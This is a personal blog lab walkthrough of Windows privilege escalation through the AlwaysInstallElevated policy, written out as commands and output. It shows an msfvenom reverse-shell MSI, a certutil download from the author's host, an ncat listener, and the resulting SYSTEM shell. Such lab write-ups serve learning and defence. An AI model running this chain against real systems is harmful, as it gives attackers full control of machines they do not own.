Beginning exploitation of AlwaysInstallElevated

Leveraging the AlwaysInstallElevated policy, allows an administrator to install a Windows installer package with system level privileges.

This is not recommended for use by Microsoft today. However, it is something I'm learning more about as I pursue my GPEN.

To be able to leverage this facility, two registry keys need to be set. These are:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Checking to the see if it is set on HKLM.

C:\>reg query HKLM\Software\Policies\Microsoft\Windows\Installer /s /f allwaysInstallElevated
End of search: 0 match(es) found.

Nothing found under HKLM, checking HKCU.

C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer /s /f allwaysInstallElevated
End of search: 0 match(es) found.

Nothing found. Now I'm going to add the values, so that I can test the vulnerability.

C:\>reg ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

C:\>reg ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /d 1 /t REG_DWORD
The operation completed successfully.

Verifying the entries have been created.

C:\>reg query HKlM\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1


C:\>reg query HKCU\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

With the two entries in place, time to create an executable via MSFVenom.

┌──(root💀securitynik)-[~/Downloads]
└─# msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.0.0.107 LPORT=9999 --format msi --out malicious.msi --smallest
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: malicious.msi

Setup a listener on port 9999.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Setup a web server to host the malicious file.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Before downloading the file and since this is about privilege escalation, time to verify the privileges this user has.

C:\tmp>whoami
sec560student\sec560


C:\tmp>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes           
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192  

Downloading the file, using Certutil.

C:\tmp>certutil -URLCache -f http://10.0.0.107:80/malicious.msi malicious.msi
****  Online  ****
CertUtil: -URLCache command completed successfully.

Confirming the file was downloaded.

┌──(root💀securitynik)-[~/Downloads]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [28/Nov/2021 19:12:25] "GET /malicious.msi HTTP/1.1" 200 -

Running the msiexec command.

C:\tmp>msiexec /quiet /qn /i malicious.msi

At this point, looking at the last command, it looks like nothing happened. Looking back at my ncat session, we see.

┌──(root💀securitynik)-[~/Downloads]
└─# ncat --verbose --listen 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

Ncat: Connection from 10.0.0.110.
Ncat: Connection from 10.0.0.110:2283.
Microsoft Windows [Version 10.0.18363.1440]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
C:\WINDOWS\system32>

Voila! We have a shell. Confirming the rights our shell now has.

C:\WINDOWS\system32>whoami                                                                                  
whoami                                                                                                      
nt authority\system 


C:\WINDOWS\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes                                        
====================================== ================ ============================================================== ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                     
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\msiserver                   Well-known group S-1-5-80-685333868-2237257676-1431965530-1907094206-2438021966 Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner   

That's it for this post!

References:
https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
https://steflan-security.com/windows-privilege-escalation-alwaysinstallelevated-policy/
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/